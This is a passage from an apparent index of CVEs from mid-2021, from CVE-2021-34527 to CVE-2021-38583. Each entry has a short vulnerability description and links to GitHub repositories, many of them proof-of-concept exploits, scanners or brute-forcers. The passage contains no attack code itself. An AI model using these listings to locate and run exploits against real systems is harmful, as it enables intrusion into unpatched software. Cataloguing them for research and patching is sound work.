- [syntaxbearror/PowerShell-PrintNightmare](https://github.com/syntaxbearror/PowerShell-PrintNightmare)
- [0xirison/PrintNightmare-Patcher](https://github.com/0xirison/PrintNightmare-Patcher)
- [Tomparte/PrintNightmare](https://github.com/Tomparte/PrintNightmare)
- [Amaranese/CVE-2021-34527](https://github.com/Amaranese/CVE-2021-34527)
- [cyb3rpeace/CVE-2021-34527](https://github.com/cyb3rpeace/CVE-2021-34527)
- [m8sec/CVE-2021-34527](https://github.com/m8sec/CVE-2021-34527)
- [hackerhouse-opensource/cve-2021-34527](https://github.com/hackerhouse-opensource/cve-2021-34527)
- [d0rb/CVE-2021-34527](https://github.com/d0rb/CVE-2021-34527)
- [TieuLong21Prosper/detect_bruteforce](https://github.com/TieuLong21Prosper/detect_bruteforce)
- [Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784](https://github.com/Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784)

### CVE-2021-34558 (2021-07-15)

The crypto/tls package of Go through 1.16.5 does not properly assert that the type of public key in an X.509 certificate matches the expected type when doing an RSA-based key exchange, allowing a malicious TLS server to cause a TLS client to panic.

- [alexzorin/cve-2021-34558](https://github.com/alexzorin/cve-2021-34558)

### CVE-2021-34600 (2022-01-20)

Telenot CompasX versions prior to 32.0 use a weak seed for random number generation leading to predictable AES keys used in the NFC tags used for local authorization of users. This may lead to total loss of trustworthiness of the installation.

- [x41sec/CVE-2021-34600](https://github.com/x41sec/CVE-2021-34600)

### CVE-2021-34621 (2021-07-07)

A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3.

- [RandomRobbieBF/CVE-2021-34621](https://github.com/RandomRobbieBF/CVE-2021-34621)
- [K3ysTr0K3R/CVE-2021-34621-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-34621-EXPLOIT)
- [navreet1425/CVE-2021-34621](https://github.com/navreet1425/CVE-2021-34621)

### CVE-2021-34646 (2021-08-30)

Versions up to, and including, 5.4.3, of the Booster for WooCommerce WordPress plugin are vulnerable to authentication bypass via the process_email_verification function due to a random token generation weakness in the reset_and_mail_activation_link function found in the ~/includes/class-wcj-emails-verification.php file. This allows attackers to impersonate users and trigger an email address verification for arbitrary accounts, including administrative accounts, and automatically be logged in as that user, including any site administrators. This requires the Email Verification module to be active in the plugin and the Login User After Successful Verification setting to be enabled, which it is by default.

- [motikan2010/CVE-2021-34646](https://github.com/motikan2010/CVE-2021-34646)
- [0xB455/CVE-2021-34646](https://github.com/0xB455/CVE-2021-34646)

### CVE-2021-34730 (2021-08-18)

A vulnerability in the Universal Plug-and-Play (UPnP) service of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of incoming UPnP traffic. An attacker could exploit this vulnerability by sending a crafted UPnP request to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a DoS condition. Cisco has not released software updates that address this vulnerability.

- [badmonkey7/CVE-2021-34730](https://github.com/badmonkey7/CVE-2021-34730)

### CVE-2021-34767 (2021-09-23)

A vulnerability in IPv6 traffic processing of Cisco IOS XE Wireless Controller Software for Cisco Catalyst 9000 Family Wireless Controllers could allow an unauthenticated, adjacent attacker to cause a Layer 2 (L2) loop in a configured VLAN, resulting in a denial of service (DoS) condition for that VLAN. The vulnerability is due to a logic error when processing specific link-local IPv6 traffic. An attacker could exploit this vulnerability by sending a crafted IPv6 packet that would flow inbound through the wired interface of an affected device. A successful exploit could allow the attacker to cause traffic drops in the affected VLAN, thus triggering the DoS condition.

- [lukejenkins/CVE-2021-34767](https://github.com/lukejenkins/CVE-2021-34767)

### CVE-2021-34824 (2021-06-29)

Istio (1.8.x, 1.9.0-1.9.5 and 1.10.0-1.10.1) contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces.

- [rsalmond/CVE-2021-34824](https://github.com/rsalmond/CVE-2021-34824)

### CVE-2021-35042 (2021-07-02)

Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.

- [YouGina/CVE-2021-35042](https://github.com/YouGina/CVE-2021-35042)
- [mrlihd/CVE-2021-35042](https://github.com/mrlihd/CVE-2021-35042)
- [r4vi/CVE-2021-35042](https://github.com/r4vi/CVE-2021-35042)
- [zer0qs/CVE-2021-35042](https://github.com/zer0qs/CVE-2021-35042)
- [LUUANHDUC/CVE-2021-35042](https://github.com/LUUANHDUC/CVE-2021-35042)

### CVE-2021-35064 (2021-07-12)

KramerAV VIAWare, all tested versions, allow privilege escalation through misconfiguration of sudo. Sudoers permits running of multiple dangerous commands, including unzip, systemctl and dpkg.

- [Chocapikk/CVE-2021-35064](https://github.com/Chocapikk/CVE-2021-35064)

### CVE-2021-35211 (2021-07-14)

Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.

- [NattiSamson/Serv-U-CVE-2021-35211](https://github.com/NattiSamson/Serv-U-CVE-2021-35211)
- [0xhaggis/CVE-2021-35211](https://github.com/0xhaggis/CVE-2021-35211)
- [BishopFox/CVE-2021-35211](https://github.com/BishopFox/CVE-2021-35211)

### CVE-2021-35215 (2021-09-01)

Insecure deserialization leading to Remote Code Execution was detected in the Orion Platform version 2020.2.5. Authentication is required to exploit this vulnerability.

- [Y4er/CVE-2021-35215](https://github.com/Y4er/CVE-2021-35215)

### CVE-2021-35250 (2022-04-25)

A researcher reported a Directory Traversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1.

- [rissor41/SolarWinds-CVE-2021-35250](https://github.com/rissor41/SolarWinds-CVE-2021-35250)

### CVE-2021-35296 (2021-10-04)

An issue in the administrator authentication panel of PTCL HG150-Ub v3.0 allows attackers to bypass authentication via modification of the cookie value and Response Path.

- [afaq1337/CVE-2021-35296](https://github.com/afaq1337/CVE-2021-35296)

### CVE-2021-35464 (2021-07-22)

ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier.

- [Y4er/openam-CVE-2021-35464](https://github.com/Y4er/openam-CVE-2021-35464)
- [rood8008/CVE-2021-35464](https://github.com/rood8008/CVE-2021-35464)

### CVE-2021-35475 (2021-06-25)

SAS Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties.

- [saitamang/CVE-2021-35475](https://github.com/saitamang/CVE-2021-35475)

### CVE-2021-35492 (2021-10-05)

Wowza Streaming Engine through 4.8.11+5 could allow an authenticated, remote attacker to exhaust filesystem resources via the /enginemanager/server/vhost/historical.jsdata vhost parameter. This is due to the insufficient management of available filesystem resources. An attacker could exploit this vulnerability through the Virtual Host Monitoring section by requesting random virtual-host historical data and exhausting available filesystem resources. A successful exploit could allow the attacker to cause database errors and cause the device to become unresponsive to web-based management. (Manual intervention is required to free filesystem resources and return the application to an operational state.)

- [N4nj0/CVE-2021-35492](https://github.com/N4nj0/CVE-2021-35492)

### CVE-2021-35576 (2021-10-20)

Vulnerability in the Oracle Database Enterprise Edition Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1 and 19c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Oracle Net to compromise Oracle Database Enterprise Edition Unified Audit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database Enterprise Edition Unified Audit accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).

- [emad-almousa/CVE-2021-35576](https://github.com/emad-almousa/CVE-2021-35576)

### CVE-2021-35587 (2022-01-19)

Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [ZZ-SOCMAP/CVE-2021-35587](https://github.com/ZZ-SOCMAP/CVE-2021-35587)

### CVE-2021-35616 (2021-10-20)

Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: UI Infrastructure). The supported version that is affected is 6.4.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data as well as unauthorized read access to a subset of Oracle Transportation Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).

- [Ofirhamam/OracleOTM](https://github.com/Ofirhamam/OracleOTM)

### CVE-2021-35956 (2021-06-30)

Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.

- [tcbutler320/CVE-2021-35956](https://github.com/tcbutler320/CVE-2021-35956)

### CVE-2021-35958 (2021-06-30)

TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives.

- [miguelc49/CVE-2021-35958-2](https://github.com/miguelc49/CVE-2021-35958-2)
- [miguelc49/CVE-2021-35958-1](https://github.com/miguelc49/CVE-2021-35958-1)

### CVE-2021-35975 (2023-11-30)

Absolute path traversal vulnerability in the Systematica SMTP Adapter component (up to v2.0.1.101) in Systematica Radius (up to v.3.9.256.777) allows remote attackers to read arbitrary files via a full pathname in GET parameter "file" in URL. Also: affected components in same product - HTTP Adapter (up to v.1.8.0.15), MSSQL MessageBus Proxy (up to v.1.1.06), Financial Calculator (up to v.1.3.05), FIX Adapter (up to v.2.4.0.25)

- [fbkcs/CVE-2021-35975](https://github.com/fbkcs/CVE-2021-35975)

### CVE-2021-36260 (2021-09-22)

A command injection vulnerability in the web server of some Hikvision products. Due to insufficient input validation, an attacker can exploit the vulnerability to launch a command injection attack by sending messages containing malicious commands.

- [rabbitsafe/CVE-2021-36260](https://github.com/rabbitsafe/CVE-2021-36260)
- [Aiminsun/CVE-2021-36260](https://github.com/Aiminsun/CVE-2021-36260)
- [TaroballzChen/CVE-2021-36260-metasploit](https://github.com/TaroballzChen/CVE-2021-36260-metasploit)
- [tuntin9x/CheckHKRCE](https://github.com/tuntin9x/CheckHKRCE)
- [Cuerz/CVE-2021-36260](https://github.com/Cuerz/CVE-2021-36260)
- [TakenoSite/Simple-CVE-2021-36260](https://github.com/TakenoSite/Simple-CVE-2021-36260)
- [r3t4k3r/hikvision_brute](https://github.com/r3t4k3r/hikvision_brute)
- [haingn/HIK-CVE-2021-36260-Exploit](https://github.com/haingn/HIK-CVE-2021-36260-Exploit)

### CVE-2021-36393 (2023-03-06)

In Moodle, an SQL injection risk was identified in the library fetching a user's recent courses.

- [StackOverflowExcept1on/CVE-2021-36393](https://github.com/StackOverflowExcept1on/CVE-2021-36393)

### CVE-2021-36394 (2023-03-06)

In Moodle, a remote code execution risk was identified in the Shibboleth authentication plugin.

- [dinhbaouit/CVE-2021-36394](https://github.com/dinhbaouit/CVE-2021-36394)
- [lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle](https://github.com/lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle)

### CVE-2021-36396 (2023-03-06)

In Moodle, insufficient redirect handling made it possible to blindly bypass cURL blocked hosts/allowed ports restrictions, resulting in a blind SSRF risk.

- [T0X1Cx/CVE-2021-36396-Exploit](https://github.com/T0X1Cx/CVE-2021-36396-Exploit)

### CVE-2021-36460 (2022-04-25)

VeryFitPro (com.veryfit2hr.second) 3.2.8 hashes the account's password locally on the device and uses the hash to authenticate in all communication with the backend API, including login, registration and changing of passwords. This allows an attacker in possession of a hash to takeover a user's account, rendering the benefits of storing hashed passwords in the database useless.

- [martinfrancois/CVE-2021-36460](https://github.com/martinfrancois/CVE-2021-36460)

### CVE-2021-36563 (2021-07-26)

The CheckMK management web console (versions 1.5.0 to 2.0.0) does not sanitise user input in various parameters of the WATO module. This allows an attacker to open a backdoor on the device using HTML content that is interpreted by the browser (such as JavaScript or other client-side scripts); the XSS payload is triggered when a user accesses specific sections of the application. A particularly dangerous scenario is an attacker who holds the monitor role (not administrator) using a stored XSS to steal the secretAutomation (used for the API in administrator mode) and thereby create another administrator user with high privileges on the CheckMK monitoring web console. Persistent XSS also allows an attacker to modify the displayed content or change the victim's information. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session.

- [Edgarloyola/CVE-2021-36563](https://github.com/Edgarloyola/CVE-2021-36563)

### CVE-2021-36593
- [mir-hossein/Statement](https://github.com/mir-hossein/Statement)

### CVE-2021-36630 (2023-01-18)

DDoS reflection amplification vulnerability in the eAut module of the Ruckus Wireless SmartZone controller that allows remote attackers to perform DoS attacks via a crafted request.

- [lixiang957/CVE-2021-36630](https://github.com/lixiang957/CVE-2021-36630)

### CVE-2021-36747 (2021-07-20)

Blackboard Learn through 9.1 allows XSS by an authenticated user via the Feedback to Learner form.

- [cseasholtz/CVE-2021-36747](https://github.com/cseasholtz/CVE-2021-36747)

### CVE-2021-36749 (2021-09-24)

In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.

- [sma11new/PocList](https://github.com/sma11new/PocList)
- [BrucessKING/CVE-2021-36749](https://github.com/BrucessKING/CVE-2021-36749)
- [zwlsix/apache_druid_CVE-2021-36749](https://github.com/zwlsix/apache_druid_CVE-2021-36749)
- [Jun-5heng/CVE-2021-36749](https://github.com/Jun-5heng/CVE-2021-36749)

### CVE-2021-36750 (2021-12-22)

ENC DataVault before 7.2 and VaultAPI v67 mishandle key derivation, making it easier for attackers to determine the passwords of all DataVault users (across USB drives sold under multiple brand names).

- [mamba-4-ever/CVE-2021-36750](https://github.com/mamba-4-ever/CVE-2021-36750)

### CVE-2021-36782 (2022-09-07)

A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners, Project Members and User Base to use the Kubernetes API to retrieve a plaintext version of sensitive data. This issue affects SUSE Rancher: Rancher versions prior to 2.5.16 and Rancher versions prior to 2.6.7.

- [fe-ax/tf-cve-2021-36782](https://github.com/fe-ax/tf-cve-2021-36782)

### CVE-2021-36798 (2021-08-09)

A Denial-of-Service (DoS) vulnerability was discovered in Team Server in HelpSystems Cobalt Strike 4.2 and 4.3. It allows remote attackers to crash the C2 server thread and block beacons' communication with it.

- [M-Kings/CVE-2021-36798](https://github.com/M-Kings/CVE-2021-36798)
- [JamVayne/CobaltStrikeDos](https://github.com/JamVayne/CobaltStrikeDos)
- [sponkmonk/CobaltSploit](https://github.com/sponkmonk/CobaltSploit)

### CVE-2021-36799 (2021-07-19)

KNX ETS5 through 5.7.6 uses the hard-coded password ETS5Password, with a salt value of Ivan Medvedev, allowing local users to read project information. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

- [robertguetzkow/ets5-password-recovery](https://github.com/robertguetzkow/ets5-password-recovery)

### CVE-2021-36808 (2021-10-30)

A local attacker could bypass the app password using a race condition in Sophos Secure Workspace for Android before version 9.7.3115.

- [ctuIhu/CVE-2021-36808](https://github.com/ctuIhu/CVE-2021-36808)

### CVE-2021-36934 (2021-07-22)

An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

An attacker must have the ability to execute code on a victim system to exploit this vulnerability.

After installing this security update, you *must* manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerability. **Simply installing this security update will not fully mitigate this vulnerability.** See [KB5005357 - Delete Volume Shadow Copies](https://support.microsoft.com/topic/1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7).

- [HuskyHacks/ShadowSteal](https://github.com/HuskyHacks/ShadowSteal)
- [JoranSlingerland/CVE-2021-36934](https://github.com/JoranSlingerland/CVE-2021-36934)
- [n3tsurge/CVE-2021-36934](https://github.com/n3tsurge/CVE-2021-36934)
- [Wh04m1001/VSSCopy](https://github.com/Wh04m1001/VSSCopy)
- [WiredPulse/Invoke-HiveNightmare](https://github.com/WiredPulse/Invoke-HiveNightmare)
- [romarroca/SeriousSam](https://github.com/romarroca/SeriousSam)
- [WiredPulse/Invoke-HiveDreams](https://github.com/WiredPulse/Invoke-HiveDreams)
- [tda90/CVE-2021-36934](https://github.com/tda90/CVE-2021-36934)
- [VertigoRay/CVE-2021-36934](https://github.com/VertigoRay/CVE-2021-36934)
- [bytesizedalex/CVE-2021-36934](https://github.com/bytesizedalex/CVE-2021-36934)
- [Preventions/CVE-2021-36934](https://github.com/Preventions/CVE-2021-36934)
- [Sp00p64/PyNightmare](https://github.com/Sp00p64/PyNightmare)
- [jmaddington/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM](https://github.com/jmaddington/Serious-Sam---CVE-2021-36934-Mitigation-for-Datto-RMM)
- [0x0D1n/CVE-2021-36934](https://github.com/0x0D1n/CVE-2021-36934)
- [exploitblizzard/CVE-2021-36934](https://github.com/exploitblizzard/CVE-2021-36934)
- [irissentinel/CVE-2021-36934](https://github.com/irissentinel/CVE-2021-36934)
- [websecnl/CVE-2021-36934](https://github.com/websecnl/CVE-2021-36934)
- [grishinpv/poc_CVE-2021-36934](https://github.com/grishinpv/poc_CVE-2021-36934)
- [shaktavist/SeriousSam](https://github.com/shaktavist/SeriousSam)
- [OlivierLaflamme/CVE-2021-36934-export-shadow-volume-POC](https://github.com/OlivierLaflamme/CVE-2021-36934-export-shadow-volume-POC)
- [chron1k/oxide_hive](https://github.com/chron1k/oxide_hive)

### CVE-2021-36949 (2021-08-12)

Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability

- [Maxwitat/Check-AAD-Connect-for-CVE-2021-36949-vulnerability](https://github.com/Maxwitat/Check-AAD-Connect-for-CVE-2021-36949-vulnerability)

### CVE-2021-36955 (2021-09-15)

Windows Common Log File System Driver Elevation of Privilege Vulnerability

- [JiaJinRong12138/CVE-2021-36955-EXP](https://github.com/JiaJinRong12138/CVE-2021-36955-EXP)

### CVE-2021-36981 (2021-08-31)

In the server in SerNet verinice before 1.22.2, insecure Java deserialization allows remote authenticated attackers to execute arbitrary code.

- [0xBrAinsTorM/CVE-2021-36981](https://github.com/0xBrAinsTorM/CVE-2021-36981)

### CVE-2021-37152 (2021-08-10)

Multiple XSS issues exist in Sonatype Nexus Repository Manager 3 before 3.33.0. An authenticated attacker with the ability to add HTML files to a repository could redirect users to Nexus Repository Manager’s pages with code modifications.

- [SecurityAnalysts/CVE-2021-37152](https://github.com/SecurityAnalysts/CVE-2021-37152)

### CVE-2021-37580 (2021-11-16)

A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0.

- [rabbitsafe/CVE-2021-37580](https://github.com/rabbitsafe/CVE-2021-37580)
- [fengwenhua/CVE-2021-37580](https://github.com/fengwenhua/CVE-2021-37580)
- [Osyanina/westone-CVE-2021-37580-scanner](https://github.com/Osyanina/westone-CVE-2021-37580-scanner)
- [ZororoZ/CVE-2021-37580](https://github.com/ZororoZ/CVE-2021-37580)
- [Liang2580/CVE-2021-37580](https://github.com/Liang2580/CVE-2021-37580)
- [Wing-song/CVE-2021-37580](https://github.com/Wing-song/CVE-2021-37580)
- [CN016/Apache-ShenYu-Admin-JWT-CVE-2021-37580-](https://github.com/CN016/Apache-ShenYu-Admin-JWT-CVE-2021-37580-)

### CVE-2021-37624 (2021-10-25)

FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.

- [0xInfection/PewSWITCH](https://github.com/0xInfection/PewSWITCH)

### CVE-2021-37678 (2021-08-12)

TensorFlow is an end-to-end open source platform for machine learning. In affected versions TensorFlow and Keras can be tricked to perform arbitrary code execution when deserializing a Keras model from YAML format. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/python/keras/saving/model_config.py#L66-L104) uses `yaml.unsafe_load` which can perform arbitrary code execution on the input. Given that YAML format support requires a significant amount of work, we have removed it for now. We have patched the issue in GitHub commit 23d6383eb6c14084a8fc3bdf164043b974818012. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.

- [fran-CICS/ExploitTensorflowCVE-2021-37678](https://github.com/fran-CICS/ExploitTensorflowCVE-2021-37678)

### CVE-2021-37740 (2022-04-20)

A denial of service vulnerability exists in MDT's firmware for the KNXnet/IP Secure router SCN-IP100.03 and KNX IP interface SCN-IP000.03 before v3.0.4, that allows a remote attacker to render the device unresponsive to all requests on the KNXnet/IP Secure layer, until the device is rebooted, via a SESSION_REQUEST frame with a modified total length field.

- [robertguetzkow/CVE-2021-37740](https://github.com/robertguetzkow/CVE-2021-37740)

### CVE-2021-37748 (2021-10-28)

Multiple buffer overflows in the limited configuration shell (/sbin/gs_config) on Grandstream HT801 devices before 1.0.29 allow remote authenticated users to execute arbitrary code as root via a crafted manage_if setting, thus bypassing the intended restrictions of this shell and taking full control of the device. There are default weak credentials that can be used to authenticate.

- [SECFORCE/CVE-2021-37748](https://github.com/SECFORCE/CVE-2021-37748)

### CVE-2021-37832 (2021-08-03)

A SQL injection vulnerability exists in version 3.0.2 of Hotel Druid when SQLite is being used as the application database. A malicious attacker can issue SQL commands to the SQLite database through the vulnerable idappartamenti parameter.

- [dievus/CVE-2021-37832](https://github.com/dievus/CVE-2021-37832)
- [AK-blank/CVE-2021-37832](https://github.com/AK-blank/CVE-2021-37832)

### CVE-2021-37833 (2021-08-03)

A reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands.

- [dievus/CVE-2021-37833](https://github.com/dievus/CVE-2021-37833)

### CVE-2021-37910 (2021-11-12)

ASUS routers' Wi-Fi protected access protocol (WPA2 and WPA3-SAE) has an improper control of interaction frequency vulnerability; an unauthenticated attacker can remotely disconnect other users' connections by sending specially crafted SAE authentication frames.

- [efchatz/easy-exploits](https://github.com/efchatz/easy-exploits)

### CVE-2021-37975 (2021-10-08)

Use after free in V8 in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [ssaroussi/CVE-2021-37975](https://github.com/ssaroussi/CVE-2021-37975)

### CVE-2021-37980 (2021-11-02)

Inappropriate implementation in Sandbox in Google Chrome prior to 94.0.4606.81 allowed a remote attacker to potentially bypass site isolation via Windows.

- [ZeusBox/CVE-2021-37980](https://github.com/ZeusBox/CVE-2021-37980)

### CVE-2021-38001 (2021-11-23)

Type confusion in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc](https://github.com/maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc)
- [Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc](https://github.com/Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc)

### CVE-2021-38003 (2021-11-23)

Inappropriate implementation in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [SpiralBL0CK/Chrome-V8-RCE-CVE-2021-38003](https://github.com/SpiralBL0CK/Chrome-V8-RCE-CVE-2021-38003)

### CVE-2021-38149 (2021-08-06)

index.php/admin/add_user in Chikitsa Patient Management System 2.0.0 allows XSS.

- [jboogie15/CVE-2021-38149](https://github.com/jboogie15/CVE-2021-38149)

### CVE-2021-38163 (2021-09-14)

SAP NetWeaver (Visual Composer 7.0 RT) versions 7.30, 7.31, 7.40, 7.50, without restriction, allow an attacker authenticated as a non-administrative user to upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down, making it unavailable.

- [core1impact/CVE-2021-38163](https://github.com/core1impact/CVE-2021-38163)

### CVE-2021-38185 (2021-08-07)

GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers an out-of-bounds heap write. NOTE: it is unclear whether there are common cases where the pattern file, associated with the -E option, is untrusted data.

- [fangqyi/cpiopwn](https://github.com/fangqyi/cpiopwn)

### CVE-2021-38295 (2021-10-14)

In Apache CouchDB, a malicious user with permission to create documents in a database is able to attach an HTML attachment to a document. If a CouchDB admin opens that attachment in a browser, e.g. via the CouchDB admin interface Fauxton, any JavaScript code embedded in that HTML attachment will be executed within the security context of that admin. A similar route is available with the already deprecated _show and _list functionality. This privilege escalation vulnerability allows an attacker to add or remove data in any database or make configuration changes. This issue affected Apache CouchDB prior to 3.1.2.

- [ProfessionallyEvil/CVE-2021-38295-PoC](https://github.com/ProfessionallyEvil/CVE-2021-38295-PoC)

### CVE-2021-38297 (2021-10-18)

Go before 1.16.9 and 1.17.x before 1.17.2 has a Buffer Overflow via large arguments in a function invocation from a WASM module, when GOARCH=wasm GOOS=js is used.

- [gkrishnan724/CVE-2021-38297](https://github.com/gkrishnan724/CVE-2021-38297)
- [paras98/CVE-2021-38297-Go-wasm-Replication](https://github.com/paras98/CVE-2021-38297-Go-wasm-Replication)

### CVE-2021-38314 (2021-09-02)

The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`.

- [orangmuda/CVE-2021-38314](https://github.com/orangmuda/CVE-2021-38314)
- [phrantom/cve-2021-38314](https://github.com/phrantom/cve-2021-38314)
- [shubhayu-64/CVE-2021-38314](https://github.com/shubhayu-64/CVE-2021-38314)
- [twseptian/cve-2021-38314](https://github.com/twseptian/cve-2021-38314)
- [c0ff33b34n/CVE-2021-38314](https://github.com/c0ff33b34n/CVE-2021-38314)
- [akhilkoradiya/CVE-2021-38314](https://github.com/akhilkoradiya/CVE-2021-38314)
- [0xGabe/CVE-2021-38314](https://github.com/0xGabe/CVE-2021-38314)

### CVE-2021-38540 (2021-09-09)

The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3.

- [Captain-v-hook/PoC-for-CVE-2021-38540-](https://github.com/Captain-v-hook/PoC-for-CVE-2021-38540-)

### CVE-2021-38560 (2022-02-01)

Ivanti Service Manager 2021.1 allows reflected XSS via the appName parameter associated with ConfigDB calls, such as in RelocateAttachments.aspx.

- [os909/iVANTI-CVE-2021-38560](https://github.com/os909/iVANTI-CVE-2021-38560)

### CVE-2021-38583 (2021-08-13)

